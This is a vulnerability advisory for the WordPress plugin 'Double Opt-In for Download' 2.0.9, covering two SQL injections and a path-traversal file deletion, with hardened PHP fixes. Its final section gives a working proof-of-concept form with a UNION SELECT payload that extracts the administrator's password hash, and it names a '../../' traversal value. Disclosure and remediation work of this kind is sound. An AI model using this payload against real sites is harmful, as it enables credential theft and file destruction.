
WordPress 'Double Opt-In for Download' 2.0.9 SQL Injection Vulnerability

Plugin homepage

Vulnerability description

Issue 1

The id parameter taken from $_POST['id'] is never sanitized before it is interpolated into a query. The handler is registered on a wp_ajax_ hook, so it can be called by any logged-in user, including a freshly registered subscriber.
File: double-opt-in-for-download\public\class-doifd.php
add_action( 'wp_ajax_populate_download_edit_form', array( $this, 'populate_download_edit_form' ) );

public function populate_download_edit_form() {

    global $wpdb; // this is how you get access to the database

    if( isset( $_POST[ 'id' ] ) ) {

        $value = $_POST[ 'id' ]; // raw, attacker-controlled string

        // $value is concatenated straight into the SQL: no absint(), no $wpdb->prepare()
        $download = $wpdb->get_row( "SELECT * FROM {$wpdb->prefix}doifd_lab_downloads WHERE doifd_download_id = $value", ARRAY_A );
    }
    echo json_encode( $download ); // whatever row the query returns, including anything a UNION appends, goes back to the caller
    die(); // this is required to terminate immediately and return a proper response
}

Issue 2

The $_REQUEST['id'] parameter used by the bulk-delete action is not sanitized either: the values are joined with commas and dropped straight into an IN() list.
File: double-opt-in-for-download\admin\includes\class-doifd-admin-download-table.php
$ids = isset ( $_REQUEST['id'] ) ? $_REQUEST['id'] : array ( ) ;
if ( is_array ( $ids ) )
    $ids = implode ( ',' , $ids ) ; // every element is attacker-controlled and unescaped

if ( ! empty ( $ids ) ) {
    $wpdb->query ( "DELETE FROM $table_name WHERE doifd_download_id IN($ids)" ) ; // the joined string is interpolated as-is, so a closing parenthesis in it rewrites the WHERE clause
}
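A hardened version of both queries, added here as an example and not taken from the plugin: the single id is coerced with absint() and bound through $wpdb->prepare(), the bulk delete builds one %d placeholder per id, and the AJAX handler additionally requires a capability and a nonce before touching the database. The doifd_example_* function names, the manage_options capability and the doifd_edit_download nonce action are assumptions; $wpdb->prepare(), absint(), check_ajax_referer(), current_user_can() and wp_send_json() are the real WordPress APIs.

```php
<?php
// Added example, not the plugin's own code. Requires WordPress to be loaded.
// Assumed names: the doifd_example_* functions, the 'manage_options' capability
// and the 'doifd_edit_download' nonce action.

add_action( 'wp_ajax_populate_download_edit_form', 'doifd_example_populate_download_edit_form' );

function doifd_example_populate_download_edit_form() {
    global $wpdb;

    // Any logged-in user reaches a wp_ajax_ hook, so gate on a capability and a nonce first.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    check_ajax_referer( 'doifd_edit_download', 'nonce' ); // dies on a missing or stale nonce

    // absint() reduces "0 UNION SELECT ..." to 0, and %d binds the value as an integer,
    // so the WHERE clause can no longer be rewritten from the request.
    $id = isset( $_POST['id'] ) ? absint( $_POST['id'] ) : 0;
    if ( 0 === $id ) {
        wp_send_json_error( 'invalid id', 400 );
    }

    $table    = $wpdb->prefix . 'doifd_lab_downloads';
    $download = $wpdb->get_row(
        $wpdb->prepare( "SELECT * FROM {$table} WHERE doifd_download_id = %d", $id ),
        ARRAY_A
    );

    wp_send_json( $download ); // json_encode + die(), as in the original, but with a JSON content type
}

// Bulk delete with a safely built IN() list. $raw_ids is $_REQUEST['id'] as received
// (a single value or an array); returns the number of rows deleted.
function doifd_example_delete_downloads( $raw_ids ) {
    global $wpdb;

    // Non-numeric input becomes 0 and is dropped by array_filter().
    $ids = array_filter( array_map( 'absint', (array) $raw_ids ) );
    if ( empty( $ids ) ) {
        return 0;
    }

    $table        = $wpdb->prefix . 'doifd_lab_downloads';
    $placeholders = implode( ',', array_fill( 0, count( $ids ), '%d' ) ); // e.g. "%d,%d,%d"

    // prepare() accepts the values as one array argument; each %d is bound separately.
    $sql = $wpdb->prepare(
        "DELETE FROM {$table} WHERE doifd_download_id IN({$placeholders})",
        array_values( $ids )
    );

    return (int) $wpdb->query( $sql );
}
```

The original Issue 2 code also accepts a single comma-joined string such as "1,2,3"; if that input shape has to be kept, split it with explode(',', ...) before passing it to doifd_example_delete_downloads(), because absint("1,2,3") yields 1 and silently drops the other ids.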

Issue 3

The $_REQUEST['doifd_file_name'] parameter (the name of the file to delete) is not sanitized at all, so a value such as ../../name.ext walks out of the download directory and unlink() removes any file the web server user is allowed to delete.
File: double-opt-in-for-download\admin\includes\class-doifd-admin-download-table.php
$file = isset ( $_REQUEST['doifd_file_name'] ) ? $_REQUEST['doifd_file_name'] : array ( ) ;
if ( is_array ( $file ) )
    $file = implode ( ',' , $file ) ;
$file = explode ( ',' , $file ) ;

foreach ( $file as $key=> $value ) {
    unlink ( DOIFD_DOWNLOAD_DIR . $value ) ; // $value is appended verbatim: no basename(), no check that the result stays inside DOIFD_DOWNLOAD_DIR
}
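A hardened replacement for the unlink() loop, added here as an example and not taken from the plugin. It strips directory components with basename(), runs the name through the WordPress helper sanitize_file_name(), and then confirms with realpath() that the resolved path still sits under the download directory. DOIFD_DOWNLOAD_DIR is the plugin's own constant; the function name is an assumption.

```php
<?php
// Added example, not the plugin's own code. Requires WordPress (sanitize_file_name)
// and the plugin's DOIFD_DOWNLOAD_DIR constant. The function name is an assumption.
// $raw_names is $_REQUEST['doifd_file_name'] as received (string or array);
// returns the names that were actually removed.

function doifd_example_delete_download_files( $raw_names ) {
    $names = is_array( $raw_names ) ? $raw_names : explode( ',', (string) $raw_names );
    $base  = realpath( DOIFD_DOWNLOAD_DIR );
    if ( false === $base ) {
        return array(); // download directory missing: nothing to delete
    }
    $deleted = array();

    foreach ( $names as $name ) {
        // basename() drops every directory component, so "../../wp-config.php" becomes
        // "wp-config.php". sanitize_file_name() then strips characters such as backslashes,
        // which basename() does not treat as a separator on Linux.
        $name = sanitize_file_name( basename( (string) $name ) );
        if ( '' === $name ) {
            continue;
        }

        // Resolve and re-check: the final path must be inside the download directory.
        // This also rejects a symlink placed in the directory that points elsewhere.
        $path = realpath( $base . DIRECTORY_SEPARATOR . $name );
        if ( false === $path || 0 !== strpos( $path, $base . DIRECTORY_SEPARATOR ) ) {
            continue;
        }

        if ( is_file( $path ) && unlink( $path ) ) {
            $deleted[] = $name;
        }
    }

    return $deleted;
}
```

The realpath() comparison is the check that matters: basename() alone is enough for the ../ case shown on this page, but the prefix test also catches anything that resolves outside the directory for a reason the name itself does not reveal.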

POC

Register an account at wp-login.php?action=register (registration must be enabled on the target) and log in, so that the browser holds an authenticated WordPress session. Then submit the following form from that browser:

<form name="xss" action="http://wp/wp-admin/admin-ajax.php?action=populate_download_edit_form" method="post">
    <input type="text" name="id" value="0 UNION SELECT 1, 2, 4, 5, 6, 7, user_pass FROM wp_users WHERE ID=1">
    <input type="submit" value="Send">
</form>

The id value makes the WHERE clause match no real row (doifd_download_id = 0) and appends a row built by the UNION, so the JSON response contains the password hash of user ID 1 (usually the account created at installation) in the column position taken by user_pass. The number of selected columns has to equal the number of columns in the doifd_lab_downloads table, and the wp_ table prefix has to be changed if the site uses a different one.

